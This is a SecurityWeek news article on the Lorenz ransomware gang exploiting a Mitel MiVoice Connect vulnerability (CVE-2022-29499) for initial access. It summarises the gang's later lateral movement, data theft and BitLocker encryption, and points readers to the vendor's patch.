Security Experts:

Connect with us

Hi, what are you looking for?



Lorenz Ransomware Gang Exploits Mitel VoIP Appliance Vulnerability in Attacks

The Lorenz ransomware group was seen exploiting a critical-severity vulnerability in Mitel MiVoice VoIP appliance for initial access into a victim’s network, cybersecurity firm Arctic Wolf reports.

The Lorenz ransomware group was seen exploiting a critical-severity vulnerability in Mitel MiVoice VoIP appliance for initial access into a victim’s network, cybersecurity firm Arctic Wolf reports.

Active since at least 2021, the Lorenz ransomware gang has been engaging in double-extortion activities: in addition to encrypting a victim’s files, the group exfiltrates data to pressure the victim into paying the ransom.

Last year, Lorenz was blamed for a cyberattack against electronic data interchange (EDI) provider Commport Communications. In 2022, the group was seen targeting small and medium businesses (SMBs) in the United States, China, and Mexico.

As part of a recent attack, Arctic Wolf Labs says, Lorenz exploited CVE-2022-29499, a remote code execution bug in MiVoice Connect, to gain a reverse shell to the victim’s network.

The observed tactics, tools, and procedures (TTPs) resemble those in a June report from CrowdStrike detailing a ransomware gang’s intrusion that exploited the same vulnerability.

After initial compromise, Lorenz deployed a copy of the open source TCP tunneling tool Chisel and used it to move laterally in the environment.

However, Arctic Wolf Labs notes that the threat actor waited for about one month after compromising the Mitel device until performing any other malicious operations.

“We have medium confidence that the webshell was placed onto the device during the initial exploitation. This is based on no additional exploitation activity being observed upon returning to the Mitel device,” the cybersecurity firm notes.

Lorenz was seen using known tools to perform credential dumping and the follow-up network and domain enumeration activities. The gang then moved laterally using compromised credentials for two privileged administrator accounts, including one with domain admin privileges.

Prior to encrypting the victim’s files, the group exfiltrated data from the environment using the file-sharing application FileZIlla. It then used the legitimate BitLocker tool to encrypt the victim’s files, by executing a crafted file directly on the domain controller.

“Although Lorenz primarily leveraged BitLocker for encryption, we observed a select few ESXi hosts with Lorenz ransomware,” Arctic Wolf Labs says.

Organizations are advised to upgrade to Mitel MiVoice Connect version R19.3, which was released in July 2022 with patches for CVE-2022-29499.

Related: QNAP Warns of New ‘Deadbolt’ Ransomware Attacks Targeting NAS Users

Related: Mitel Devices Abused for DDoS Vector With Record-Breaking Amplification Ratio

Related: PetitPotam Vulnerability Exploited in Ransomware Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content


The FBI dismantled the network of the prolific Hive ransomware gang and seized infrastructure in Los Angeles that was used for the operation.

Management & Strategy

Industry professionals comment on the recent disruption of the Hive ransomware operation and its hacking by law enforcement.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.


US government reminds the public that a reward of up to $10 million is offered for information on cybercriminals, including members of the Hive...

Mobile & Wireless

Apple rolled out iOS 16.3 and macOS Ventura 13.2 to cover serious security vulnerabilities.

Mobile & Wireless

Technical details published for an Arm Mali GPU flaw leading to arbitrary kernel code execution and root on Pixel 6.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.

Mobile & Wireless

Apple’s iOS 12.5.7 update patches CVE-2022-42856, an actively exploited vulnerability, in old iPhones and iPads.